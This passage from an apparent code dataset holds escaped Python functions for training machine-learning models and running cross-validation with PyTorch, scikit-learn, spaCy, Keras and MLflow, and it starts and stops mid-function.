self.get_loss_weights(batch_speakers, type=types[0])\r\n else:\r\n loss_weights = self.get_loss_weights(batch_speakers, type=types[1])\r\n loss = loss * loss_weights\r\n\r\n # Backward and optimize.\r\n self.reset_grad()\r\n # loss.backward()\r\n loss.sum().backward()\r\n self.g_optimizer.step()\r\n\r\n if iterations % self.log_step == 0:\r\n print(str(iterations) + ', loss: ' + str(loss.sum().item()))\r\n if self.use_tensorboard:\r\n self.logger.scalar_summary('loss', loss.sum().item(), iterations)\r\n\r\n if iterations % self.model_save_step == 0:\r\n \"\"\"Calculate validation loss\"\"\"\r\n val_loss = self.val_loss(val=val_gen, iterations=iterations)\r\n print(str(iterations) + ', val_loss: ' + str(val_loss))\r\n if self.use_tensorboard:\r\n self.logger.scalar_summary('val_loss', val_loss, iterations)\r\n \"\"\"Save model checkpoints.\"\"\"\r\n if iterations % self.model_save_step == 0:\r\n G_path = os.path.join(self.model_save_dir, '{}-G.ckpt'.format(iterations))\r\n torch.save({'model': self.G.state_dict(),\r\n 'optimizer': self.g_optimizer.state_dict()}, G_path)\r\n print('Saved model checkpoints into {}...'.format(self.model_save_dir))\r\n\r\n iterations += 1", "def _do_training_cross_validation(self) -> None:\n\n cfg = self.cfg_\n fit_kwargs = {'classes': list(self.data_.classes)}\n\n # Store all of the samples used during cross-validation\n self.y_training_set_all_ = list(self._generate_samples(self.train_ids_, 'y'))\n\n # Initialize learner objects with the optimal set of parameters\n # learned from the grid search round (one for each\n # sub-experiment of the cross-validation round)\n for learner, learner_name in zip(self.learners_, self.learner_names_):\n self.cv_learners_[learner_name] = \\\n [learner(**self.learner_gs_cv_params_[learner_name])\n for i in range(len(self.data_.training_set))]\n\n # Make a list of empty lists corresponding to each estimator\n # instance for each learner, which will be used to store the\n # performance metrics for each cross-validation\n # leave-one-fold-out sub-experiment\n self.cv_learner_stats_ = [[] for _ in cfg.learners]\n\n # Fit the `SelectPercentile` 
feature selector (if applicable)\n if cfg.feature_selection_percentile != 1.0:\n loginfo('Removing {0}% of the features during training round...'\n .format(100 - 100*cfg.feature_selection_percentile))\n feature_selector = \\\n (SelectPercentile(chi2,\n percentile=100*cfg.feature_selection_percentile)\n .fit(self._vectorize_and_sparsify_data(self.training_vec_,\n self.train_ids_),\n self.y_training_set_all_))\n\n # For each fold of the training set, train on all of the other\n # folds and evaluate on the one left out fold\n for i, held_out_fold in enumerate(self.data_.training_set):\n\n loginfo('Cross-validation sub-experiment #{0} in progress'\n .format(i + 1))\n\n # Use each training fold (except for the held-out set) to\n # incrementally build up the model\n training_folds = (self.data_.training_set[:i]\n + self.data_.training_set[i + 1:])\n y_train_all = []\n for j, training_fold in enumerate(training_folds):\n\n # Get the training data\n y_train = list(self._generate_samples(training_fold, 'y'))\n y_train_all.extend(y_train)\n X_train = self._vectorize_and_sparsify_data(self.training_vec_,\n training_fold)\n if cfg.feature_selection_percentile != 1.0:\n X_train = feature_selector.transform(X_train)\n\n # Iterate over the learners\n for learner_name in self.learner_names_:\n\n # Partially fit each estimator with the new training\n # data (specifying the `classes` keyword argument if\n # this is the first go-round and it's a learner that\n # requires this to be specified initially)\n (self.cv_learners_[learner_name][i]\n .partial_fit(X_train,\n y_train,\n **fit_kwargs if not j and learner_name\n in self.requires_classes_kwarg_\n else {}))\n\n # Get mean and standard deviation for actual values\n y_train_all = np.array(y_train_all)\n y_train_mean = y_train_all.mean()\n y_train_std = y_train_all.std()\n\n # Get test data\n y_test = list(self._generate_samples(held_out_fold, 'y'))\n X_test = self._vectorize_and_sparsify_data(self.training_vec_,\n held_out_fold)\n if cfg.feature_selection_percentile != 1.0:\n X_test = feature_selector.transform(X_test)\n\n # Make predictions with the modified estimators\n for j, learner_name in enumerate(self.learner_names_):\n\n # Make predictions with the given estimator,rounding the\n # predictions\n y_test_preds = \\\n np.round(self.cv_learners_[learner_name][i].predict(X_test))\n\n # Rescale the predicted values based on the\n # mean/standard deviation of the actual values and\n # fit the predicted values within the original scale\n # (i.e., no predicted values should be outside the range\n # of possible values)\n y_test_preds_dict = \\\n ex.rescale_preds_and_fit_in_scale(y_test_preds,\n self.data_.classes,\n y_train_mean,\n y_train_std)\n\n if cfg.rescale:\n y_test_preds = y_test_preds_dict['rescaled']\n else:\n y_test_preds = y_test_preds_dict['fitted_only']\n\n # Evaluate the predictions and add to list of evaluation\n # reports for each learner\n (self.cv_learner_stats_[j]\n .append(ex.evaluate_predictions_from_learning_round(\n y_test=y_test,\n y_test_preds=y_test_preds,\n classes=self.data_.classes,\n prediction_label=cfg.prediction_label,\n non_nlp_features=cfg.non_nlp_features,\n nlp_features=cfg.nlp_features,\n learner=self.cv_learners_[learner_name][i],\n learner_name=learner_name,\n games=cfg.games,\n test_games=cfg.games,\n _round=i + 1,\n iteration_rounds=self.data_.folds,\n n_train_samples=len(y_train_all),\n n_test_samples=len(held_out_fold),\n rescaled=cfg.rescale,\n transformation_string=self.transformation_string_,\n 
bin_ranges=cfg.bin_ranges)))", "def cross_validation_visualization(lambds, score_tr, score_te):\n plt.semilogx(lambds, score_tr, marker=\".\", color='b', label='train score');\n plt.semilogx(lambds, score_te, marker=\".\", color='r', label='test score');\n plt.xlabel(\"lambda\")\n plt.ylabel(\"score\")\n plt.title(\"cross validation\")\n plt.legend(loc=2)\n plt.grid(True)\n plt.savefig(\"cross_validation_test\")", "def do_crossval():\n df = read_df()\n # X = df['review'].apply(remove_html_lower)\n\n X = df['review']\n y = df['sentiment']\n X_train, X_holdout, y_train, y_holdout = train_test_split(X, y, test_size=0.3, shuffle=True, stratify=y, random_state=222 )\n\n tfidf = TfidfVectorizer(stop_words='english', min_df=2, max_df=0.8, ngram_range=(1,4))\n stem_pipeline = make_pipeline(TextNormalizer(), tfidf, LogisticRegression(C=100))\n cv = StratifiedShuffleSplit(n_splits=3, test_size=0.2)\n\n scores = cross_val_score(stem_pipeline, X_train, y_train, cv=cv, scoring='accuracy', n_jobs=-1)\n print(scores, scores.mean())", "def cross_validation(self, x, t, k=5):\n print(\"Cross validation of the SVM Model...\")\n\n # Initialize best error / hyperparameters\n best_error = float('inf')\n best_reg = 0\n best_deg = 0\n\n # Cross-validation 80-20\n N = len(x)\n N_train = math.floor(0.8 * N)\n t = t.reshape((N,))\n\n #Initialize the grid search\n\n log_min_reg = np.log(0.001)\n log_max_reg = np.log(1000)\n reg_list = np.logspace(log_min_reg, log_max_reg, num=7, base=math.e)\n\n min_deg = 1\n max_deg = 4\n\n for deg in range(min_deg, max_deg):\n for reg in reg_list:\n errors = np.zeros(k)\n for j in range(k):\n map_index = list(zip(x, t))\n random.shuffle(map_index)\n random_x, random_t = zip(*map_index)\n\n train_x = random_x[:N_train]\n valid_x = random_x[N_train:]\n train_t = random_t[:N_train]\n valid_t = random_t[N_train:]\n\n self.model = SVC(gamma='auto', kernel='poly', degree=deg, C=reg, cache_size=1000)\n self.train(train_x, train_t)\n\n error_valid = np.array([self.error(x_n, t_n) for t_n, x_n in zip(valid_t, valid_x)])\n errors[j] = error_valid.mean()\n\n mean_error = np.mean(errors)\n print(mean_error)\n if mean_error < best_error:\n best_error = mean_error\n best_reg = reg\n best_deg = deg\n print(\"The new best hyper parameters are : \", best_reg, best_deg)\n\n print(\"Best hyper parameters are : \", best_reg, best_deg)\n print(\"Validation error : \", 100 * best_error, \"%\")\n self.model = SVC(gamma='auto', kernel='poly', degree=best_deg, C=best_reg)\n self.train(x, t)", "def cross_train_module(\n model: nn.Module,\n dataset: Union[NumpyArrayTuple, torch.utils.data.Dataset],\n loss_fxn,\n optimizer: torch.optim.Optimizer,\n device: torch.device,\n validation_split: float = 0.0,\n validation_dataset: Union[NumpyArrayTuple, torch.utils.data.Dataset] = None,\n metrics_map: MetricsMapType = None,\n epochs: int = 5,\n batch_size: int = 64,\n l1_reg: float = None,\n reporting_interval: int = 1,\n lr_scheduler: Union[LRSchedulerType, ReduceLROnPlateauType] = None,\n early_stopping: EarlyStopping = None,\n shuffle: bool = True,\n num_workers: int = 0,\n verbose: bool = True,\n) -> MetricsHistory:\n # validate parameters passed into function\n assert 0.0 <= validation_split < 1.0, \"cross_train_module: 'validation_split' must be a float between (0.0, 1.0]\"\n if loss_fxn is None:\n raise ValueError(\"cross_train_module: 'loss_fxn' cannot be None\")\n if optimizer is None:\n raise ValueError(\"cross_train_module: 'optimizer' cannot be None\")\n\n reporting_interval = 1 if reporting_interval < 1 
else reporting_interval\n reporting_interval = 1 if reporting_interval >= epochs else reporting_interval\n\n train_dataset, val_dataset = dataset, validation_dataset\n\n if isinstance(train_dataset, tuple):\n # train dataset was a tuple of np.ndarrays - convert to Dataset\n torch_X_train = torch.from_numpy(train_dataset[0]).type(torch.FloatTensor)\n torch_y_train = torch.from_numpy(train_dataset[1]).type(\n torch.LongTensor if train_dataset[1].dtype in [np.int, np.long] else torch.FloatTensor\n )\n train_dataset = torch.utils.data.TensorDataset(torch_X_train, torch_y_train)\n\n if (val_dataset is not None) and isinstance(val_dataset, tuple):\n # cross-val dataset was a tuple of np.ndarrays - convert to Dataset\n torch_X_val = torch.from_numpy(val_dataset[0]).type(torch.FloatTensor)\n torch_y_val = torch.from_numpy(val_dataset[1]).type(\n torch.LongTensor if val_dataset[1].dtype in [np.int, np.long] else torch.FloatTensor\n )\n val_dataset = torch.utils.data.TensorDataset(torch_X_val, torch_y_val)\n\n # split the dataset if validation_split > 0.0\n if (validation_split > 0.0) and (validation_dataset is None):\n # NOTE: validation_dataset supersedes validation_split!!\n # Use validation_split only if validation_dataset is None\n train_dataset, val_dataset = split_dataset(train_dataset, validation_split)\n\n if val_dataset is not None:\n print(\n f\"Cross training on '{device}' with {len(train_dataset)} training and \"\n + f\"{len(val_dataset)} cross-validation records...\",\n flush=True,\n )\n else:\n print(f\"Training on '{device}' with {len(train_dataset)} records...\", flush=True)\n\n if reporting_interval != 1:\n print(f\"NOTE: progress will be reported every {reporting_interval} epoch!\")\n\n l1_penalty = None if l1_reg is None else torch.nn.L1Loss()\n if l1_reg is not None:\n print(f\"Adding L1 regularization with lambda = {l1_reg}\")\n\n history = None\n\n try:\n model = model.to(device)\n tot_samples = len(train_dataset)\n len_num_epochs, len_tot_samples = len(str(epochs)), len(str(tot_samples))\n # create metrics history\n history = MetricsHistory(metrics_map, (val_dataset is not None))\n train_batch_size = batch_size if batch_size != -1 else len(train_dataset)\n\n for epoch in range(epochs):\n model.train()\n # reset metrics\n history.clear_batch_metrics()\n # loop over records in training dataset (use DataLoader)\n train_dataloader = torch.utils.data.DataLoader(\n train_dataset, batch_size=train_batch_size, shuffle=shuffle, num_workers=num_workers\n )\n num_batches, samples = 0, 0\n\n for batch_no, (X, y) in enumerate(train_dataloader):\n X = X.to(device)\n y = y.to(device)\n # clear accumulated gradients\n optimizer.zero_grad()\n # make forward pass\n preds = model(X)\n # calculate loss\n loss_tensor = loss_fxn(preds, y)\n # add L1 if mentioned - L2 Regularization is handled by optimizer!\n if l1_reg is not None:\n reg_loss = 0\n for param in model.parameters():\n reg_loss += l1_penalty(param)\n loss_tensor += reg_loss * l1_reg\n # compute gradients\n loss_tensor.backward()\n # update weights\n optimizer.step()\n\n # compute batch metric(s)\n preds = preds.to(device)\n history.calculate_batch_metrics(preds.to(\"cpu\"), y.to(\"cpu\"), loss_tensor.item(), val_metrics=False)\n\n num_batches += 1\n samples += len(X)\n\n if (reporting_interval == 1) and verbose:\n # display progress with batch metrics - will display line like this:\n # Epoch ( 3/100): ( 45/1024) -> loss: 3.456 - acc: 0.275\n metricsStr = history.get_metrics_str(batch_metrics=True, include_val_metrics=False)\n print(\n 
\"\\rEpoch (%*d/%*d): (%*d/%*d) -> %s\"\n % (\n len_num_epochs,\n epoch + 1,\n len_num_epochs,\n epochs,\n len_tot_samples,\n samples,\n len_tot_samples,\n tot_samples,\n metricsStr,\n ),\n end=\"\",\n flush=True,\n )\n else:\n # all train batches are over - display average train metrics\n history.calculate_epoch_metrics(val_metrics=False)\n if val_dataset is None:\n if (epoch == 0) or ((epoch + 1) % reporting_interval == 0) or ((epoch + 1) == epochs):\n metricsStr = history.get_metrics_str(batch_metrics=False, include_val_metrics=False)\n print(\n \"\\rEpoch (%*d/%*d): (%*d/%*d) -> %s\"\n % (\n len_num_epochs,\n epoch + 1,\n len_num_epochs,\n epochs,\n len_tot_samples,\n samples,\n len_tot_samples,\n tot_samples,\n metricsStr,\n ),\n flush=True,\n )\n # training ends here as there is no cross-validation dataset\n else:\n # we have a validation dataset\n # same print as above except for trailing ... and end=''\n if (epoch == 0) or ((epoch + 1) % reporting_interval == 0) or ((epoch + 1) == epochs):\n metricsStr = history.get_metrics_str(batch_metrics=False, include_val_metrics=False)\n print(\n \"\\rEpoch (%*d/%*d): (%*d/%*d) -> %s...\"\n % (\n len_num_epochs,\n epoch + 1,\n len_num_epochs,\n epochs,\n len_tot_samples,\n samples,\n len_tot_samples,\n tot_samples,\n metricsStr,\n ),\n end=\"\",\n flush=True,\n )\n\n val_batch_size = batch_size if batch_size != -1 else len(val_dataset)\n model.eval()\n with torch.no_grad():\n # val_dataloader = None if val_dataset is None else \\\n val_dataloader = torch.utils.data.DataLoader(\n val_dataset,\n batch_size=val_batch_size,\n shuffle=shuffle,\n num_workers=num_workers,\n )\n num_val_batches = 0\n\n for val_X, val_y in val_dataloader:\n val_X = val_X.to(device)\n val_y = val_y.to(device)\n val_preds = model(val_X)\n val_batch_loss = loss_fxn(val_preds, val_y).item()\n history.calculate_batch_metrics(\n val_preds.to(\"cpu\"),\n val_y.to(\"cpu\"),\n val_batch_loss,\n val_metrics=True,\n )\n num_val_batches += 1\n else:\n # loop over val_dataset completed - compute val average metrics\n history.calculate_epoch_metrics(val_metrics=True)\n # display final metrics\n if (epoch == 0) or ((epoch + 1) % reporting_interval == 0) or ((epoch + 1) == epochs):\n metricsStr = history.get_metrics_str(batch_metrics=False, include_val_metrics=True)\n print(\n \"\\rEpoch (%*d/%*d): (%*d/%*d) -> %s\"\n % (\n len_num_epochs,\n epoch + 1,\n len_num_epochs,\n epochs,\n len_tot_samples,\n samples,\n len_tot_samples,\n tot_samples,\n metricsStr,\n ),\n flush=True,\n )\n\n if (early_stopping is not None) and (val_dataset is not None):\n # early stooping test only if validation dataset is used\n monitored_metric = early_stopping.monitored_metric()\n last_metric_val = history.metrics_history[monitored_metric][\"epoch_vals\"][-1]\n early_stopping(model, last_metric_val, epoch)\n if early_stopping.early_stop:\n # load last state\n model.load_state_dict(torch.load(early_stopping.checkpoint_path()))\n model.eval()\n break\n\n # step the learning rate scheduler at end of epoch\n if (lr_scheduler is not None) and (epoch < epochs - 1):\n # have to go to these hoops as ReduceLROnPlateau requires a metric for step()\n if isinstance(lr_scheduler, torch.optim.lr_scheduler.ReduceLROnPlateau):\n lr_metric = (\n history.metrics_history[\"loss\"][\"epoch_vals\"][-1]\n if val_dataset is not None\n else history.metrics_history[\"val_loss\"][\"epoch_vals\"][-1]\n )\n lr_scheduler.step(lr_metric)\n else:\n lr_scheduler.step()\n\n return history\n finally:\n model = model.to(\"cpu\")", "def 
crossValidatePredictor(X,y,clfinputs,logfile='cvout.log'):\n \n models,modelcvs,preds,probs = [],[],[],[]\n scores = dict([(key,[]) for key in list(scorefn.keys())])\n errors = dict([(key,[]) for key in list(errorfn.keys())])\n\n # validate class labels\n uy = np.unique(y)\n if len(uy) != 2:\n print('error: need 2 classes for classification!')\n return {}\n \n N,ymin = len(y),uy[0]\n\n if cv_type == 'loo':\n cv = KFold(N,n_folds=N,random_state=train_state)\n y_pred = np.zeros(N)\n y_prob = np.zeros(N)\n else: \n cv = StratifiedKFold(y,n_folds=train_folds,random_state=train_state)\n\n n_folds = len(cv) \n model_id = clfinputs['clf_type']\n widgets = ['%s cv: '%cv_type, Percentage(), ' ', Bar('='), ' ', ETA()]\n pbar = ProgressBar(widgets=widgets, maxval=n_folds+(cv_type=='loo')).start()\n with open(logfile,'w') as logfid:\n cv_test_index = []\n scorekeys = sorted(scores.keys())\n for i,(train_index,test_index) in enumerate(cv):\n pbar.update(i)\n X_train, X_test = X[train_index], X[test_index]\n y_train, y_test = y[train_index], y[test_index]\n\n cv_test_index.extend(test_index) \n \n # xgb assumes labels \\in {0,1}\n if model_id == 'xgb' and ymin == -1: \n y_train[y_train==-1] = 0 \n\n # train/predict as usual\n clf,clf_cv = train(X_train,y_train,clfinputs)\n clf_pred = clf.predict(X_test)\n if model_id == 'xgb' and ymin == -1:\n clf_pred[clf_pred==0] = -1\n\n if cv_probs:\n clf_prob = clf.predict_proba(X_test)[:,0]\n else:\n clf_prob = np.ones(len(clf_pred))*np.nan\n \n # loo predicts one label per 'fold'\n if cv_type == 'loo':\n\n y_pred[test_index] = clf_pred\n y_prob[test_index] = clf_prob\n # compute scores for the points we've classified thus far\n y_test_cur = np.atleast_1d(y[cv_test_index])\n y_pred_cur = np.atleast_1d(y_pred[cv_test_index])\n \n for score,score_fn in list(scorefn.items()):\n scorei = score_fn(y_test_cur,y_pred_cur,uy)\n scores[score] = [scorei] \n else:\n # collect output for all test samples in this fold\n for score,score_fn in list(scorefn.items()):\n scorei = score_fn(y_test,clf_pred,uy)\n scores[score].append(scorei) \n preds.append(clf_pred)\n probs.append(clf_prob)\n models.append(clf)\n modelcvs.append(clf_cv)\n for error,error_fn in list(errorfn.items()):\n errors[error].append(error_fn(y_test,clf_pred))\n\n if i==0:\n scorenames = ['%-16s'%score for score in scorekeys]\n logstr = '%-8s %s'%('i',''.join(scorenames))\n else:\n curscores = ['%-16.4f'%(np.mean(scores[score]))\n for score in scorekeys] \n logstr = '%-8.3g %s'%(i,''.join(curscores))\n print(logstr,file=logfid,flush=True)\n\n # train full model for loo cv, score on loo preds from above\n if cv_type == 'loo':\n for score,score_fn in list(scorefn.items()): \n scores[score] = [score_fn(y,y_pred,uy)]\n for error,error_fn in list(errorfn.items()):\n errors[error] = [error_fn(y,y_pred)]\n\n clf,clf_cv = train(X,y,clfinputs)\n models = [clf]\n modelcvs = [clf_cv]\n preds = [y_pred]\n probs = [y_prob]\n pbar.update(i+1)\n pbar.finish() \n\n # output scores ordered by key\n for score_id in scorekeys:\n score_vals = scores[score_id]\n print('mean %s: %7.4f (std=%7.4f)'%(score_id, np.mean(score_vals),\n np.std(score_vals)))\n\n return {'preds':preds,'probs':probs,'scores':scores,'errors':errors,\n 'models':models,'modelcvs':modelcvs}", "def train_model_cross_validation(model, train_docs, test_docs, nb_iter, output_dir, spacy_type = True, nb_folds = 5):\n\n print(output_dir)\n os.mkdir(output_dir) # creating the output directory\n print(\" ============= TRAINING MODEL ===========================\")\n\n\n # 
tuple conversion (the tuple type is lost when dataframe -> excel -> dataframe)\n\n #docs['annotations'] = [[tuple(ann) for ann in annotations] for annotations in docs['annotations'].to_numpy()]\n\n\n # cross validation :\n\n models = []\n all_scores = []\n\n kf = KFold(n_splits=nb_folds)\n c = 0\n for train_index, val_index in kf.split(train_docs):\n\n train_data = train_docs.iloc[train_index, :]\n val_data = train_docs.iloc[val_index, :]\n\n # spacy_format\n TRAIN_DATA = [(text, {'entities': entities}) for [text, entities] in train_data[['text', 'annotations']].to_numpy()]\n\n # trim entities : leading whitespace make the model bug\n TRAIN_DATA = trim_entity_spans(TRAIN_DATA)\n\n # loading of the model\n nlp = model\n\n optimizer = nlp.begin_training()\n\n # get names of other pipes to disable them during training\n pipe_exceptions = [\"ner\" ] #\"trf_wordpiecer\", \"trf_tok2vec\"\n other_pipes = [pipe for pipe in nlp.pipe_names if pipe not in pipe_exceptions]\n\n scores = []\n\n # training\n with nlp.disable_pipes(*other_pipes): # only train NER\n\n if not spacy_type : # add the other labels\n ner = nlp.get_pipe(\"ner\")\n ner.add_label('AGE_RELATED')\n ner.add_label('DURATION')\n ner.add_label('FREQUENCY')\n ner.add_label('OTHER')\n\n for i in range(nb_iter):\n\n print('Iteration ', i)\n print()\n losses = {}\n random.shuffle(TRAIN_DATA) # ??\n\n path = ''\n if spacy_type:\n path = 'spacy_model_' + str(c) + '_fold'\n else:\n path = 'all_types_model_' + str(c) + '_fold'\n\n batches = minibatch(TRAIN_DATA, size=1) #compounding(4.0, 20.0, 1.001)\n\n for batch in batches:\n texts, annotations = zip(*batch)\n try:\n nlp.update(texts, annotations, sgd = optimizer, drop=0.5, losses = losses)\n print(\"Losses\", losses)\n except Exception as e:\n print(e)\n #print(text)\n\n tp_g, fp_g, fn_g, p, r, f, pt, rt, ft, type_dict = test_model(test_docs, nlp)\n scores += [(p, r, r, pt, rt, ft)]\n print()\n print()\n\n # test the trained model\n test_model(val_data, nlp)\n\n df_scores = pd.DataFrame(scores, columns = ['span_precision', 'span_recall', 'span_f1', 'type_precision', 'type_recall', 'type_f1'])\n df_scores.to_excel(output_dir + '/' + path + '.xlsx')\n\n\n models += [nlp]\n all_scores += [scores]\n # save model to output directory\n if output_dir is not None:\n nlp.to_disk(output_dir + '/' + path)\n print(\"Saved model to\", output_dir + '/' + path)\n\n c += 1\n\n return models, all_scores", "def train_model(\r\n train_x: pd.DataFrame,\r\n train_y: pd.DataFrame,\r\n parameters: Dict[str, Any]\r\n) -> sklearn_Pipeline:\r\n # Build a multi-class logistic regression model\r\n model_params = parameters['model_params']\r\n model = LogisticRegression(**model_params)\r\n\r\n if parameters['model_standard_scaler']:\r\n # Prepare column transformer to do scaling\r\n col_transformer = ColumnTransformer(\r\n [\r\n (\r\n 'standard_scaler',\r\n StandardScaler(copy=False),\r\n [\r\n \"sepal_length\",\r\n \"sepal_width\",\r\n \"petal_length\",\r\n \"petal_width\",\r\n ],\r\n ),\r\n ],\r\n remainder='drop',\r\n )\r\n\r\n # Make pipeline w/ scaler\r\n model_pipeline = sklearn_Pipeline(\r\n steps=[\r\n ('col_transformer', col_transformer),\r\n ('model', model),\r\n ]\r\n )\r\n else:\r\n # Make pipeline w/o scaler\r\n model_pipeline = sklearn_Pipeline(\r\n steps=[\r\n ('model', model),\r\n ]\r\n )\r\n\r\n # Fit\r\n model_pipeline.fit(train_x, train_y)\r\n\r\n mlflow.set_experiment('iris-example')\r\n mlflow_sklearn.log_model(sk_model=model_pipeline, artifact_path=\"model\")\r\n 
mlflow.log_params(model_params)\r\n\r\n # Print out the model pipeline\r\n # See: http://www.xavierdupre.fr/app/mlinsights/helpsphinx/notebooks/visualize_pipeline.html\r\n dot = pipeline2dot(model_pipeline, train_x)\r\n dot_filename = 'pipeline_dot.dot'\r\n with open(dot_filename, 'w', encoding='utf-8') as f:\r\n f.write(dot)\r\n if sys.platform.startswith(\"win\") and \"Graphviz\" not in os.environ[\"PATH\"]:\r\n os.environ['PATH'] = os.environ['PATH'] + r';C:\\Program Files (x86)\\Graphviz2.38\\bin'\r\n cmd = \"dot -G=300 -Tpng {0} -o{0}.png\".format(dot_filename)\r\n run_cmd(cmd, wait=True, fLOG=print)\r\n mlflow.log_artifact('{0}.png'.format(dot_filename), 'model')\r\n\r\n return model_pipeline", "def crossValidationKfold(automodel, \r\n X, y,\r\n params_automl : dict = {},\r\n score_function = accuracy_score,\r\n cv : int = 3,\r\n shuffle: bool = True,\r\n verbose : bool = True,\r\n allmetrics: bool = False):\r\n if(isinstance(X, pd.DataFrame) or isinstance(y, pd.DataFrame)):\r\n X = X.values\r\n y = y.values\r\n skf = StratifiedKFold(n_splits = cv, \r\n shuffle = shuffle, \r\n random_state = 42)\r\n if(allmetrics):\r\n train_scores = {'accuracy' : [], \r\n 'roc_auc': [], \r\n 'f1' : [], \r\n 'recall' : [], \r\n 'precision': []}\r\n test_scores = {'accuracy' : [], \r\n 'roc_auc': [], \r\n 'f1' : [], \r\n 'recall' : [], \r\n 'precision': []}\r\n else:\r\n train_scores = np.empty((cv, ))\r\n test_scores = np.empty((cv, ))\r\n for idx, (idx_tr, idx_ts) in enumerate(skf.split(X, y)):\r\n X_tr, X_ts = X[idx_tr], X[idx_ts]\r\n y_tr, y_ts = y[idx_tr], y[idx_ts] \r\n am = automodel(**params_automl)\r\n am.fit(X_tr, y_tr)\r\n if(not allmetrics):\r\n \r\n train_scores[idx] = score_function(am.predict(X_tr), y_tr)\r\n test_scores[idx] = score_function(am.predict(X_ts), y_ts)\r\n if(verbose):\r\n print('it: {} train score: {:.3f}, val score: {:.3f}'.format(idx, \r\n train_scores[idx],\r\n test_scores[idx]))\r\n else:\r\n train_current = {}\r\n test_current = {}\r\n for name, metric in all_metrics_classifications.items():\r\n train_current[name] = metric(am.predict(X_tr), y_tr)\r\n test_current[name] = metric(am.predict(X_ts), y_ts)\r\n train_scores[name].append(train_current[name])\r\n test_scores[name].append(test_current[name])\r\n \r\n if(verbose):\r\n print('it: {} train scores: {}, val scores: {}'.format(idx, train_current,\r\n test_current))\r\n\r\n if(not allmetrics):\r\n return test_scores.mean(), test_scores.std()\r\n else:\r\n # -- calculate means of all metrics-- #\r\n return dict(map(lambda kv: (kv[0], np.asarray(kv[1]).mean()), test_scores.items()))", "def validate(model, dataloader, idx_to_char, device, config):\n\n validation_cer = test(model, dataloader, idx_to_char, device, config, with_analysis=False, plot_all=False, validation=True, with_iterations=False)\n LOGGER.info(f\"Validation CER: {validation_cer}\")\n\n if config['lowest_loss'] > validation_cer:\n if config[\"validation_jsons\"]:\n test_cer = test(config[\"model\"], config.test_dataloader, config[\"idx_to_char\"], config[\"device\"], config,\n validation=False, with_iterations=False)\n LOGGER.info(f\"Saving Best Loss! 
Test CER: {test_cer}\")\n else:\n test_cer = validation_cer\n\n config['lowest_loss'] = validation_cer\n save_model(config, bsf=True)\n return validation_cer", "def model_train(fold_name, model_dir, model_dict, dataset_path, development_subj, mu, sigma):\n valid_frames_before=200\n valid_frames_after=0\n valid_batch_size=8\n generators = TXT_Train_Validation_Generators(dataset_path=dataset_path, subject_list=development_subj, train_size=model_dict[\"train_set_ratio\"], frames_before=model_dict[\n \"frames\"]-model_dict[\"frame_shift\"], frames_after=model_dict[\"frame_shift\"], view_IDs=model_dict[\"view_IDs\"], batch_size=model_dict[\"batch_size\"], mu=mu, sigma=sigma, label_name=model_dict[\"label_name\"], shuffle=True,\n valid_frames_before=valid_frames_before, valid_frames_after=valid_frames_after, valid_batch_size=valid_batch_size)\n train_gen, valid_gen = generators.get_train(), generators.get_valid()\n losses = Losses_Keras(\n frames=model_dict['frames'], frame_shift=model_dict['frame_shift'])\n loss_fnc = losses.get_by_name(model_dict[\"loss_function\"])\n ap_metrics = [AUC_AP(), Accuracy_AP(), Precision_AP(),\n Recall_AP(), PrecisionAtRecall_AP(0.95)]\n fp_hdf5 = os.path.join(model_dir, fold_name+\".hdf5\")\n fp_hdf5 = os.path.join(model_dir, fold_name+\".hdf5\")\n mcp = ModelCheckpoint(fp_hdf5, monitor='val_loss', verbose=True,\n save_best_only=True, save_weights_only=True)\n tbl = tensorflow.keras.callbacks.TensorBoard(os.path.join(model_dir, 'logs{}'.format(fold_name)))\n metrics = ap_metrics\n callbacks = [mcp, tbl]\n optimizer = tensorflow.keras.optimizers.Adam(learning_rate=model_dict['learning_rate'])\n epochs = model_dict[\"epochs\"]\n #### 1\n compile_kwargs = {\"loss\": loss_fnc,\n \"optimizer\": optimizer, \"metrics\": metrics}\n fit_kwargs = {\"x\": train_gen, \"epochs\": epochs,\n \"validation_data\": valid_gen, \"callbacks\": callbacks}\n Setup = SETUP_DIC[model_dict[\"architecture\"]]\n setup = Setup(name=model_dict[\"name\"], compile_kwargs=compile_kwargs, fit_kwargs=fit_kwargs,\n TPA_view_IDs=model_dict['view_IDs'])\n # setup.delete_existing_model_data_and_output()\n print(setup.model.summary())\n\n setup.train()\n setup.write_architecture()\n # setup.plot_metrics(plot_val_metrics=valid_gen)\n #### /1\n #### 2\n # Get optimal threshold.\n print(\"Getting optimal threshold...\")\n # RELOAD\n data_models_model_path = setup.data_models_model_path\n setup = Model_Evaluation(data_models_model_path, fold_name=fold_name,\n stateful=False, weights_ext=\"hdf5\", load_scaling=False)\n\n # https://support.sas.com/en/books/reference-books/analyzing-receiver-operating-characteristic-curves-with-sas/review.html\n # Gonen, Mithat. 2007. Analyzing Receiver Operating Characteristic Curves with SAS. 
Cary, NC: SAS Institute Inc.\n preds_list, trues_list = [], []\n # generators = [train_gen, valid_gen] if valid_gen else [train_gen]\n generators = [valid_gen] if valid_gen else [train_gen]\n for generator in generators:\n for i in range(len(generator)):\n x, y = generator[i]\n preds_list.append(setup.model.predict(x))\n trues_list.append(y)\n preds = np.vstack(preds_list)\n trues = np.vstack(trues_list)\n labels_dict, predictions_dict = {}, {}\n for idx, l in enumerate(zip(preds, trues)):\n pred, true = l\n predictions_dict[idx] = pred[:, 1]\n sample_class = true[-1][-1]\n labels_dict[idx] = model_dict[\"frames\"] - \\\n model_dict[\"frame_shift\"] if sample_class else -1\n if valid_gen:\n labels_dict[idx] = valid_frames_before if sample_class else -1\n prc_pre_fpr, prc_pre_tpr, prc_pre_thresholds = plots.prediction_pr_curve(\n labels_dict, predictions_dict)\n # get optimal threshold\n fpr, tpr, thresh = prc_pre_fpr[:-1], prc_pre_tpr[:-1], prc_pre_thresholds\n xy = np.stack([fpr, tpr]).T\n ideal = np.array([1, 1])\n d = ideal-xy\n D = (d*d).sum(axis=-1)\n optimal_threshold = thresh[D.argmin()]\n with open(os.path.join(data_models_model_path, project.THRESHOLD_FILE_PATTERN.format(fold_name)), \"wb\") as f:\n pickle.dump(optimal_threshold, f)\n #### /2\n print(\"Trained {}\".format(model_dict[\"name\"]))\n clear_session()\n return True", "def __train__(self):\n if (self.type_camf == 'CAMF_CI'):\n #users, items, context, ratings\n ci = camf_ci.CI_class(self.__users_array__, self.__items_array__, self.__context_array__, self.__ratings__, self.fold, self.lr, self.factors)\n predictions, losses = ci.fit()\n elif (self.type_camf == 'CAMF_CU'):\n cu = camf_cu.CU_class(self.__users_array__, self.__items_array__, 